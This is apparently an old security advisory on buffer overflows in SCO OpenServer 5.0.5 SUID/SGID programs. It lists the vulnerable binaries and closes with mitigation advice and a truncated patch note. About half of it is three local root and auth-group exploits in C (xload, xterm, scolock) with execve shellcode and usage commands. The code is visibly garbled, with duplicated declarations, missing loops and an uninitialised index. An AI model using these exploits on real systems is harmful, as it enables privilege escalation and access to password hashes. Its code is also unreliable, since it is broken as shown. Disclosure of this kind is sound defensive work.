buffer overflows


    SCO 5.0.5+Skunware98


    Brock Tellier found following.  After some light security auditing
    he found  approximately nineteen  buffer overflows  in various SCO
    5.0.5+Skunkware98   programs.    This   was,   by   no   means,  a
    comprehensive audit of SCO's su/gids  so we can be sure  there are
    dozens of  holes missed.   Keep in  mind also  that this  was ONLY
    command  line  buffer  overflow   testing  and  did  not   include
    environment, file  i/o, or  any other  sort of  overflow.   And no
    /tmp races looking around.

    Some  of  these  holes  are  old  to  the  world  of security, but
    apparently  SCO  hasn't  caught  up  yet.   For  instance,  anyone
    remember  the  old  Xt  library  holes  in  xterm and such?  Well,
    apparently SCO  doesn't.   Not to  mention the  fact that  in June
    someone posted  an xterm  exploit (though  the author  didn't make
    clear  that  all  programs  using  the  Xt  library  were probably
    vulnerable) and SCO never came out with a fix.  Thus this  program
    as  well  as  all  others  in  the  class  are  still  vulnerable.
    Following  is  a  list  of  vulnerable  programs  and their su/gid

    Potential root:
    SUID root

        1. xload -bg $1492bytes
        2. xterm -bg $1492bytes
        3. xmcd -bg $1492bytes

    Exploit for xload follows (however, it won't work):

     * <xloadx.c> Local root exploit
     * Offset: xload (SCO OpenServer 5.0.4)
     * 0 -> From an open scoterm (without display parameter)
     * 2000 -> From remote telnet (with display parameter)
     * Usage:
     * $ cc xloadx.c -o xloadx
     * $ scoterm
     * $ /usr/bin/X11/xload -geometry `xloadx 0`
     * 			or
     * $ /usr/bin/X11/xload -display -geometry `xloadx 2000`
     * Note: xload need to be run from a valid x-display
     * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
     * <> - <>

    #include <stdlib.h>
    #include <stdio.h>

    char hell[]=

    char hell[]=
    "\xeb\x1b" // start: jmp uno
    "\x5e" // dos: popl %esi
    "\x31\xdb" // xorl %ebx,%ebx
    "\x89\x5e\x07" // movb %bl,0x7(%esi)
    "\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
    "\x88\x5e\x11" // movb %bl,0x11(%esi)
    "\x31\xc0" // xorl %eax,%eax
    "\xb0\x3b" // movb $0x3b,%al
    "\x8d\x7e\x07" // leal 0x07(%esi),%edi
    "\x89\xf9" // movl %edi,%ecx
    "\x53" // pushl %ebx
    "\x51" // pushl %ecx
    "\x56" // pushl %esi
    "\x56" // pushl %esi
    "\xeb\x10" // jmp execve
    "\xe8\xe0\xff\xff\xff" // uno: call dos
    "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0

    #define OFF 0x80462ff 	// SCO OpenServer 5.0.4
    #define ALINEA 3
    #define LEN 2000

    int main(int argc, char *argv[]) {

    int offset=0;
    char buf[LEN];
    int i;

    if(argc < 2) {
	    printf("Usage: xloadx <offset>\n");
	    exit(0); }
    else {
	    offset=atoi(argv[1]); }

	    *(int *)&buf[i]=OFF+offset;



    Here's for xterm:

     * <xtermx.c> Local root exploit
     * Offset: xterm (SCO OpenServer 5.0.4)
     * 0 -> From an open scoterm (without display parameter)
     * 0 -> Openserver 5.0.2 (with display parameter)
     * 2000 -> From remote telnet (with display parameter)
     * Usage:
     * $ cc xtermx.c -o xtermx
     * $ scoterm
     * $ /usr/bin/X11/xterm -bg `xtermx 0`
     * 			or
     * $ /usr/bin/X11/xterm -display -bg `xtermx 2000`
     * Note: xterm need to be run from a valid x-display
     * By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
     * <> - <>

    #include <stdlib.h>
    #include <stdio.h>

    char hell[]=

    char hell[]=
    "\xeb\x1b" // start: jmp uno
    "\x5e" // dos: popl %esi
    "\x31\xdb" // xorl %ebx,%ebx
    "\x89\x5e\x07" // movb %bl,0x7(%esi)
    "\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
    "\x88\x5e\x11" // movb %bl,0x11(%esi)
    "\x31\xc0" // xorl %eax,%eax
    "\xb0\x3b" // movb $0x3b,%al
    "\x8d\x7e\x07" // leal 0x07(%esi),%edi
    "\x89\xf9" // movl %edi,%ecx
    "\x53" // pushl %ebx
    "\x51" // pushl %ecx
    "\x56" // pushl %esi
    "\x56" // pushl %esi
    "\xeb\x10" // jmp execve
    "\xe8\xe0\xff\xff\xff" // uno: call dos
    "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0

    #define OFF 0x80471ff 	// SCO OpenServer 5.0.4
    #define ALINEA 0
    #define LEN 2000

    int main(int argc, char *argv[]) {

    int offset=0;
    char buf[LEN];
    int i;

    if(argc < 2) {
	    printf("Usage: xtermx <offset>\n");
	    exit(0); }
    else {
	    offset=atoi(argv[1]); }

	    *(int *)&buf[i]=OFF+offset;



    SUID auth (Auth has rw access to /etc/shadow)

        4. xlock -bg $1492bytes
        5. xscreensaver -bg $1492bytes
        6. scolock -bg $1492bytes

    Now, here's the scolock exploit:

     * <scolockx.c> Local exploit - Gives you an auth group suid shell
     * h0h0h0!! auth group has read/write access to /etc/shadow (w3 4r3 r00t!)
     * $ ls -al /etc/shadow
     * -rw-rw----   1 root     auth         323 Jun 14 23:09 /etc/shadow
     * Offset: scolockx (SCO OpenServer 5.0.4)
     * 0 -> with -display parameter
     * Usage:
     * $ cc scolockx.c -o scolockx
     * $ /usr/bin/X11/scolock -display -bg `scolockx 0`
     * Note: scolock need to be run from a valid x-display
     * By: The Dark Raver of CPNE (Murcia/Spain - 28/6/99)
     * <> - <>

    #include <stdlib.h>
    #include <stdio.h>

    char hell[]=
    "\xeb\x16" // start: jmp uno
    "\x5e" // dos: popl %esi
    "\x31\xdb" // xorl %ebx,%ebx
    "\x89\x5e\x07" // movb %bl,0x7(%esi)
    "\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
    "\x88\x5e\x11" // movb %bl,0x11(%esi)
    "\x31\xc0" // xorl %eax,%eax
    "\xb0\x3b" // movb $0x3b,%al
    "\x53" // pushl %ebx
    "\x53" // pushl %ebx
    "\x56" // pushl %esi
    "\x56" // pushl %esi
    "\xeb\x10" // jmp execve
    "\xe8\xe5\xff\xff\xff" // uno: call dos
    "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0

    #define OFF 0x8047a98 	// SCO OpenServer 5.0.4
    #define ALINEA 0
    #define LEN 2000

    int main(int argc, char *argv[]) {

    int offset=0;
    char buf[LEN];
    int i;

    if(argc < 2) {
	    printf("Usage: scolockx <offset>\n");
	    exit(0); }
    else {
	    offset=atoi(argv[1]); }

	    *(int *)&buf[i]=OFF+offset;



    SUID mem (strings /dev/kmem)

        7. sar -o $2105bytes or sar -f $1077bytes x

    Potential lp:
    SUID lp

        8. cancel $998bytes (isn't this one old too?)
        9. lp $10000bytes (didn't get the exact number)
        10. reject $10000bytes (as above)

    Potential bin:
    SUID bin

        11. sd $1017bytes (SIGSEGV @1017 SIGTERM 1 to 1017bytes)

    Potential annoyance:
    SUID dos

        12. doscat $19031bytes
        13. doscp "" x
        14. dosdir ""
        15. dosls ""
        16. dosmkdir ""
        17. dosrm ""
        18. dosrmdir ""

    SUID uucp

        19. ati $40bytes


    For most of  these programs, you're  going to have  to suffer with
    some broken functionality when you remove the s-bits.  The various
    suid root and auth won't be able to function without their  su/gid
    status.  However  you could make  a new group  such as xusers  and
    have  these  programs  only  executable  by  its members.  In fact
    adding trusted users to the lp  group is probably the best way  to
    overcome these lp vulnerabilities as well.

    SCO will  have a  patch for  OpenServer 5.0.5  in two weeks, which
    will be available from